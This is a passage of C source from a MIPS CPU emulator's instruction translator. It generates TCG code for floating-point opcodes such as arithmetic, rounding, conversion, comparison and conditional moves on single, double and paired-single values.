gen_load_fpr32(ctx, fp1, ft); gen_helper_float_recip2_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); tcg_temp_free_i32(tcg_ctx, fp1); gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } } break; case OPC_MINA_S: /* OPC_RECIP1_S */ if (ctx->insn_flags & ISA_MIPS32R6) { /* OPC_MINA_S */ TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp2 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_load_fpr32(ctx, fp1, ft); gen_helper_float_mina_s(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1); gen_store_fpr32(ctx, fp2, fd); tcg_temp_free_i32(tcg_ctx, fp2); tcg_temp_free_i32(tcg_ctx, fp1); tcg_temp_free_i32(tcg_ctx, fp0); } else { /* OPC_RECIP1_S */ check_cp1_64bitmode(ctx); { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_helper_float_recip1_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } } break; case OPC_MAX_S: /* OPC_RSQRT1_S */ if (ctx->insn_flags & ISA_MIPS32R6) { /* OPC_MAX_S */ TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_load_fpr32(ctx, fp1, ft); gen_helper_float_max_s(tcg_ctx, fp1, tcg_ctx->cpu_env, fp0, fp1); gen_store_fpr32(ctx, fp1, fd); tcg_temp_free_i32(tcg_ctx, fp1); tcg_temp_free_i32(tcg_ctx, fp0); } else { /* OPC_RSQRT1_S */ check_cp1_64bitmode(ctx); { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_helper_float_rsqrt1_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } } break; case OPC_MAXA_S: /* OPC_RSQRT2_S */ if (ctx->insn_flags & ISA_MIPS32R6) { /* OPC_MAXA_S */ TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_load_fpr32(ctx, fp1, ft); gen_helper_float_maxa_s(tcg_ctx, fp1, tcg_ctx->cpu_env, fp0, fp1); gen_store_fpr32(ctx, fp1, fd); tcg_temp_free_i32(tcg_ctx, fp1); tcg_temp_free_i32(tcg_ctx, fp0); } else { /* OPC_RSQRT2_S */ check_cp1_64bitmode(ctx); { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_load_fpr32(ctx, fp1, ft); gen_helper_float_rsqrt2_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); tcg_temp_free_i32(tcg_ctx, fp1); gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } } break; case OPC_CVT_D_S: check_cp1_registers(ctx, fd); { TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr32(ctx, fp32, fs); gen_helper_float_cvtd_s(tcg_ctx, fp64, tcg_ctx->cpu_env, fp32); tcg_temp_free_i32(tcg_ctx, fp32); gen_store_fpr64(ctx, fp64, fd); tcg_temp_free_i64(tcg_ctx, fp64); } break; case OPC_CVT_W_S: { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); if (ctx->nan2008) { gen_helper_float_cvt_2008_w_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); } else { gen_helper_float_cvt_w_s(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); } gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_CVT_L_S: check_cp1_64bitmode(ctx); { TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr32(ctx, fp32, fs); if (ctx->nan2008) { gen_helper_float_cvt_2008_l_s(tcg_ctx, fp64, tcg_ctx->cpu_env, fp32); } else { gen_helper_float_cvt_l_s(tcg_ctx, fp64, tcg_ctx->cpu_env, fp32); } tcg_temp_free_i32(tcg_ctx, fp32); gen_store_fpr64(ctx, fp64, fd); tcg_temp_free_i64(tcg_ctx, fp64); } break; case OPC_CVT_PS_S: check_ps(ctx); { TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); TCGv_i32 fp32_0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp32_1 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp32_0, fs); gen_load_fpr32(ctx, fp32_1, ft); tcg_gen_concat_i32_i64(tcg_ctx, fp64, fp32_1, fp32_0); tcg_temp_free_i32(tcg_ctx, fp32_1); tcg_temp_free_i32(tcg_ctx, fp32_0); gen_store_fpr64(ctx, fp64, fd); tcg_temp_free_i64(tcg_ctx, fp64); } break; case OPC_CMP_F_S: case OPC_CMP_UN_S: case OPC_CMP_EQ_S: case OPC_CMP_UEQ_S: case OPC_CMP_OLT_S: case OPC_CMP_ULT_S: case OPC_CMP_OLE_S: case OPC_CMP_ULE_S: case OPC_CMP_SF_S: case OPC_CMP_NGLE_S: case OPC_CMP_SEQ_S: case OPC_CMP_NGL_S: case OPC_CMP_LT_S: case OPC_CMP_NGE_S: case OPC_CMP_LE_S: case OPC_CMP_NGT_S: check_insn_opc_removed(ctx, ISA_MIPS32R6); if (ctx->opcode & (1 << 6)) { gen_cmpabs_s(ctx, func - 48, ft, fs, cc); } else { gen_cmp_s(ctx, func - 48, ft, fs, cc); } break; case OPC_ADD_D: check_cp1_registers(ctx, fs | ft | fd); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_helper_float_add_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); tcg_temp_free_i64(tcg_ctx, fp1); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_SUB_D: check_cp1_registers(ctx, fs | ft | fd); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_helper_float_sub_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); tcg_temp_free_i64(tcg_ctx, fp1); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_MUL_D: check_cp1_registers(ctx, fs | ft | fd); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_helper_float_mul_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); tcg_temp_free_i64(tcg_ctx, fp1); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_DIV_D: check_cp1_registers(ctx, fs | ft | fd); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_helper_float_div_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); tcg_temp_free_i64(tcg_ctx, fp1); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_SQRT_D: check_cp1_registers(ctx, fs | fd); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_helper_float_sqrt_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_ABS_D: check_cp1_registers(ctx, fs | fd); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); if (ctx->abs2008) { tcg_gen_andi_i64(tcg_ctx, fp0, fp0, 0x7fffffffffffffffULL); } else { gen_helper_float_abs_d(tcg_ctx, fp0, fp0); } gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_MOV_D: check_cp1_registers(ctx, fs | fd); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_NEG_D: check_cp1_registers(ctx, fs | fd); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); if (ctx->abs2008) { tcg_gen_xori_i64(tcg_ctx, fp0, fp0, 1ULL << 63); } else { gen_helper_float_chs_d(tcg_ctx, fp0, fp0); } gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_ROUND_L_D: check_cp1_64bitmode(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); if (ctx->nan2008) { gen_helper_float_round_2008_l_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); } else { gen_helper_float_round_l_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); } gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_TRUNC_L_D: check_cp1_64bitmode(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); if (ctx->nan2008) { gen_helper_float_trunc_2008_l_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); } else { gen_helper_float_trunc_l_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); } gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_CEIL_L_D: check_cp1_64bitmode(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); if (ctx->nan2008) { gen_helper_float_ceil_2008_l_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); } else { gen_helper_float_ceil_l_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); } gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_FLOOR_L_D: check_cp1_64bitmode(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); if (ctx->nan2008) { gen_helper_float_floor_2008_l_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); } else { gen_helper_float_floor_l_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); } gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_ROUND_W_D: check_cp1_registers(ctx, fs); { TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp64, fs); if (ctx->nan2008) { gen_helper_float_round_2008_w_d(tcg_ctx, fp32, tcg_ctx->cpu_env, fp64); } else { gen_helper_float_round_w_d(tcg_ctx, fp32, tcg_ctx->cpu_env, fp64); } tcg_temp_free_i64(tcg_ctx, fp64); gen_store_fpr32(ctx, fp32, fd); tcg_temp_free_i32(tcg_ctx, fp32); } break; case OPC_TRUNC_W_D: check_cp1_registers(ctx, fs); { TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp64, fs); if (ctx->nan2008) { gen_helper_float_trunc_2008_w_d(tcg_ctx, fp32, tcg_ctx->cpu_env, fp64); } else { gen_helper_float_trunc_w_d(tcg_ctx, fp32, tcg_ctx->cpu_env, fp64); } tcg_temp_free_i64(tcg_ctx, fp64); gen_store_fpr32(ctx, fp32, fd); tcg_temp_free_i32(tcg_ctx, fp32); } break; case OPC_CEIL_W_D: check_cp1_registers(ctx, fs); { TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp64, fs); if (ctx->nan2008) { gen_helper_float_ceil_2008_w_d(tcg_ctx, fp32, tcg_ctx->cpu_env, fp64); } else { gen_helper_float_ceil_w_d(tcg_ctx, fp32, tcg_ctx->cpu_env, fp64); } tcg_temp_free_i64(tcg_ctx, fp64); gen_store_fpr32(ctx, fp32, fd); tcg_temp_free_i32(tcg_ctx, fp32); } break; case OPC_FLOOR_W_D: check_cp1_registers(ctx, fs); { TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp64, fs); if (ctx->nan2008) { gen_helper_float_floor_2008_w_d(tcg_ctx, fp32, tcg_ctx->cpu_env, fp64); } else { gen_helper_float_floor_w_d(tcg_ctx, fp32, tcg_ctx->cpu_env, fp64); } tcg_temp_free_i64(tcg_ctx, fp64); gen_store_fpr32(ctx, fp32, fd); tcg_temp_free_i32(tcg_ctx, fp32); } break; case OPC_SEL_D: check_insn(ctx, ISA_MIPS32R6); gen_sel_d(ctx, op1, fd, ft, fs); break; case OPC_SELEQZ_D: check_insn(ctx, ISA_MIPS32R6); gen_sel_d(ctx, op1, fd, ft, fs); break; case OPC_SELNEZ_D: check_insn(ctx, ISA_MIPS32R6); gen_sel_d(ctx, op1, fd, ft, fs); break; case OPC_MOVCF_D: check_insn_opc_removed(ctx, ISA_MIPS32R6); gen_movcf_d(ctx, fs, fd, (ft >> 2) & 0x7, ft & 0x1); break; case OPC_MOVZ_D: check_insn_opc_removed(ctx, ISA_MIPS32R6); { TCGLabel *l1 = gen_new_label(tcg_ctx); TCGv_i64 fp0; if (ft != 0) { tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_gpr[ft], 0, l1); } fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); gen_set_label(tcg_ctx, l1); } break; case OPC_MOVN_D: check_insn_opc_removed(ctx, ISA_MIPS32R6); { TCGLabel *l1 = gen_new_label(tcg_ctx); TCGv_i64 fp0; if (ft != 0) { tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr[ft], 0, l1); fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); gen_set_label(tcg_ctx, l1); } } break; case OPC_RECIP_D: check_cp1_registers(ctx, fs | fd); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_helper_float_recip_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_RSQRT_D: check_cp1_registers(ctx, fs | fd); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_helper_float_rsqrt_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_MADDF_D: check_insn(ctx, ISA_MIPS32R6); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp2 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_load_fpr64(ctx, fp2, fd); gen_helper_float_maddf_d(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); gen_store_fpr64(ctx, fp2, fd); tcg_temp_free_i64(tcg_ctx, fp2); tcg_temp_free_i64(tcg_ctx, fp1); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_MSUBF_D: check_insn(ctx, ISA_MIPS32R6); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp2 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_load_fpr64(ctx, fp2, fd); gen_helper_float_msubf_d(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); gen_store_fpr64(ctx, fp2, fd); tcg_temp_free_i64(tcg_ctx, fp2); tcg_temp_free_i64(tcg_ctx, fp1); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_RINT_D: check_insn(ctx, ISA_MIPS32R6); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_helper_float_rint_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_CLASS_D: check_insn(ctx, ISA_MIPS32R6); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_helper_float_class_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_MIN_D: /* OPC_RECIP2_D */ if (ctx->insn_flags & ISA_MIPS32R6) { /* OPC_MIN_D */ TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_helper_float_min_d(tcg_ctx, fp1, tcg_ctx->cpu_env, fp0, fp1); gen_store_fpr64(ctx, fp1, fd); tcg_temp_free_i64(tcg_ctx, fp1); tcg_temp_free_i64(tcg_ctx, fp0); } else { /* OPC_RECIP2_D */ check_cp1_64bitmode(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_helper_float_recip2_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); tcg_temp_free_i64(tcg_ctx, fp1); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } } break; case OPC_MINA_D: /* OPC_RECIP1_D */ if (ctx->insn_flags & ISA_MIPS32R6) { /* OPC_MINA_D */ TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_helper_float_mina_d(tcg_ctx, fp1, tcg_ctx->cpu_env, fp0, fp1); gen_store_fpr64(ctx, fp1, fd); tcg_temp_free_i64(tcg_ctx, fp1); tcg_temp_free_i64(tcg_ctx, fp0); } else { /* OPC_RECIP1_D */ check_cp1_64bitmode(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_helper_float_recip1_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } } break; case OPC_MAX_D: /* OPC_RSQRT1_D */ if (ctx->insn_flags & ISA_MIPS32R6) { /* OPC_MAX_D */ TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_helper_float_max_d(tcg_ctx, fp1, tcg_ctx->cpu_env, fp0, fp1); gen_store_fpr64(ctx, fp1, fd); tcg_temp_free_i64(tcg_ctx, fp1); tcg_temp_free_i64(tcg_ctx, fp0); } else { /* OPC_RSQRT1_D */ check_cp1_64bitmode(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_helper_float_rsqrt1_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } } break; case OPC_MAXA_D: /* OPC_RSQRT2_D */ if (ctx->insn_flags & ISA_MIPS32R6) { /* OPC_MAXA_D */ TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_helper_float_maxa_d(tcg_ctx, fp1, tcg_ctx->cpu_env, fp0, fp1); gen_store_fpr64(ctx, fp1, fd); tcg_temp_free_i64(tcg_ctx, fp1); tcg_temp_free_i64(tcg_ctx, fp0); } else { /* OPC_RSQRT2_D */ check_cp1_64bitmode(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_helper_float_rsqrt2_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); tcg_temp_free_i64(tcg_ctx, fp1); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } } break; case OPC_CMP_F_D: case OPC_CMP_UN_D: case OPC_CMP_EQ_D: case OPC_CMP_UEQ_D: case OPC_CMP_OLT_D: case OPC_CMP_ULT_D: case OPC_CMP_OLE_D: case OPC_CMP_ULE_D: case OPC_CMP_SF_D: case OPC_CMP_NGLE_D: case OPC_CMP_SEQ_D: case OPC_CMP_NGL_D: case OPC_CMP_LT_D: case OPC_CMP_NGE_D: case OPC_CMP_LE_D: case OPC_CMP_NGT_D: check_insn_opc_removed(ctx, ISA_MIPS32R6); if (ctx->opcode & (1 << 6)) { gen_cmpabs_d(ctx, func - 48, ft, fs, cc); } else { gen_cmp_d(ctx, func - 48, ft, fs, cc); } break; case OPC_CVT_S_D: check_cp1_registers(ctx, fs); { TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp64, fs); gen_helper_float_cvts_d(tcg_ctx, fp32, tcg_ctx->cpu_env, fp64); tcg_temp_free_i64(tcg_ctx, fp64); gen_store_fpr32(ctx, fp32, fd); tcg_temp_free_i32(tcg_ctx, fp32); } break; case OPC_CVT_W_D: check_cp1_registers(ctx, fs); { TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp64, fs); if (ctx->nan2008) { gen_helper_float_cvt_2008_w_d(tcg_ctx, fp32, tcg_ctx->cpu_env, fp64); } else { gen_helper_float_cvt_w_d(tcg_ctx, fp32, tcg_ctx->cpu_env, fp64); } tcg_temp_free_i64(tcg_ctx, fp64); gen_store_fpr32(ctx, fp32, fd); tcg_temp_free_i32(tcg_ctx, fp32); } break; case OPC_CVT_L_D: check_cp1_64bitmode(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); if (ctx->nan2008) { gen_helper_float_cvt_2008_l_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); } else { gen_helper_float_cvt_l_d(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); } gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_CVT_S_W: { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_helper_float_cvts_w(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_CVT_D_W: check_cp1_registers(ctx, fd); { TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr32(ctx, fp32, fs); gen_helper_float_cvtd_w(tcg_ctx, fp64, tcg_ctx->cpu_env, fp32); tcg_temp_free_i32(tcg_ctx, fp32); gen_store_fpr64(ctx, fp64, fd); tcg_temp_free_i64(tcg_ctx, fp64); } break; case OPC_CVT_S_L: check_cp1_64bitmode(ctx); { TCGv_i32 fp32 = tcg_temp_new_i32(tcg_ctx); TCGv_i64 fp64 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp64, fs); gen_helper_float_cvts_l(tcg_ctx, fp32, tcg_ctx->cpu_env, fp64); tcg_temp_free_i64(tcg_ctx, fp64); gen_store_fpr32(ctx, fp32, fd); tcg_temp_free_i32(tcg_ctx, fp32); } break; case OPC_CVT_D_L: check_cp1_64bitmode(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_helper_float_cvtd_l(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_CVT_PS_PW: check_ps(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_helper_float_cvtps_pw(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_ADD_PS: check_ps(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_helper_float_add_ps(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); tcg_temp_free_i64(tcg_ctx, fp1); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_SUB_PS: check_ps(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_helper_float_sub_ps(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); tcg_temp_free_i64(tcg_ctx, fp1); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_MUL_PS: check_ps(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_helper_float_mul_ps(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); tcg_temp_free_i64(tcg_ctx, fp1); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_ABS_PS: check_ps(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_helper_float_abs_ps(tcg_ctx, fp0, fp0); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_MOV_PS: check_ps(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_NEG_PS: check_ps(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_helper_float_chs_ps(tcg_ctx, fp0, fp0); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_MOVCF_PS: check_ps(ctx); gen_movcf_ps(ctx, fs, fd, (ft >> 2) & 0x7, ft & 0x1); break; case OPC_MOVZ_PS: check_ps(ctx); { TCGLabel *l1 = gen_new_label(tcg_ctx); TCGv_i64 fp0; if (ft != 0) { tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_gpr[ft], 0, l1); } fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); gen_set_label(tcg_ctx, l1); } break; case OPC_MOVN_PS: check_ps(ctx); { TCGLabel *l1 = gen_new_label(tcg_ctx); TCGv_i64 fp0; if (ft != 0) { 